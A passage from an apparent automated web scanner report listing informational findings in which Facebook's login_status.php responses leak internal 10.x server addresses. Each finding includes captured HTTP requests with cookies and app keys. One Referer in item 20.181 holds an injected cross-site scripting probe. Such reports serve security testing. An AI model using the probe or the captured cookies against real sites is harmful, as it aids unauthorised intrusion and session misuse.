Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2616e5be4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff377786e5&relation=parent&transport=postmessage&frame=f3891ed05
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.119
X-Cnection: close
Date: Thu, 05 May 2011 02:16:27 GMT
Content-Length: 0

20.173. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.54.113

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a1dab04c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f4119c24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfb7eabbf8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221abf4a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b5a5f14c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffed13492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b4f69f4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f221abf4a4&origin=http%3A%2F%2Faol.sportingnews.com%2Ffed13492&relation=parent&transport=postmessage&frame=f5b4f69f4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.54.113
X-Cnection: close
Date: Thu, 05 May 2011 02:06:56 GMT
Content-Length: 0

20.174. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.115.59

Request

Response

20.175. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.142.109

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31377da28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20cd4127c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cadfc1a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6834b99c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1002da43c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f0f70294%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfcd9787c8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f6834b99c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3f0f70294&relation=parent&transport=postmessage&frame=fcd9787c8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.109
X-Cnection: close
Date: Thu, 05 May 2011 02:01:15 GMT
Content-Length: 0

20.176. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.37.57

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26285d1fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd4e87644%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df19b162584%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9c43e95c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffe24891%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff316d67154%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df156385028&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9c43e95c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff316d67154&relation=parent&transport=postmessage&frame=f156385028
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.37.57
X-Cnection: close
Date: Thu, 05 May 2011 01:04:06 GMT
Content-Length: 0

20.177. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.181.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35337699%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25acfbae4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3871b77e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15f666d24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25d754e34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff28daf444c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df297fe543c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15f666d24&origin=http%3A%2F%2Faol.sportingnews.com%2Ff28daf444c&relation=parent&transport=postmessage&frame=f297fe543c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.37
X-Cnection: close
Date: Thu, 05 May 2011 02:15:15 GMT
Content-Length: 0

20.178. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.121.37

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df113654da4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2febd6d8c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a4b36fdc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bdbf70b%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17f6f780%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e3782514&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1bdbf70b&origin=http%3A%2F%2Ftechcrunch.com%2Ff345970418&relation=parent&transport=postmessage&frame=f3e3782514
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.37
X-Cnection: close
Date: Thu, 05 May 2011 01:19:10 GMT
Content-Length: 0

20.179. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.66.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d5a38f9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25b1fc23c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1315a89b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc78c882%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df144ad2948%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1019ba1c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df39e2d23fc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fc78c882&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1019ba1c&relation=parent&transport=postmessage&frame=f39e2d23fc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.66.45
X-Cnection: close
Date: Thu, 05 May 2011 01:37:47 GMT
Content-Length: 0

20.180. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.42.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26f68768%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ba640c78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df384b32954%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff409df34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2935de05c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2a4b4f67%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff0d748a&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ff409df34&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2a4b4f67&relation=parent&transport=postmessage&frame=ff0d748a
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.42.27
X-Cnection: close
Date: Thu, 05 May 2011 01:39:00 GMT
Content-Length: 0

20.181. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.219.109

Request

GET /extern/login_status.php?api_key=188636667827818&app_id=188636667827818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ca1f2ec%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df309fbd89%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37698649c%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23f527ee4%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ebf36c7%26origin%3Dhttp%253A%252F%252Fportalblog.aol.com%252Ff2979901a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5a7f9c8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/?ba9f0%22-alert(1)-%22394da22382f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f23f527ee4&origin=http%3A%2F%2Fportalblog.aol.com%2Ff2979901a8&relation=parent&transport=postmessage&frame=f1f5a7f9c8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.219.109
X-Cnection: close
Date: Thu, 05 May 2011 10:56:21 GMT
Content-Length: 0

20.182. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.99.85

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10e19524%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12b93ec04%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df853f0e2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ba0f78a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5a1429bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1c1d15cfc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25b8338e&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
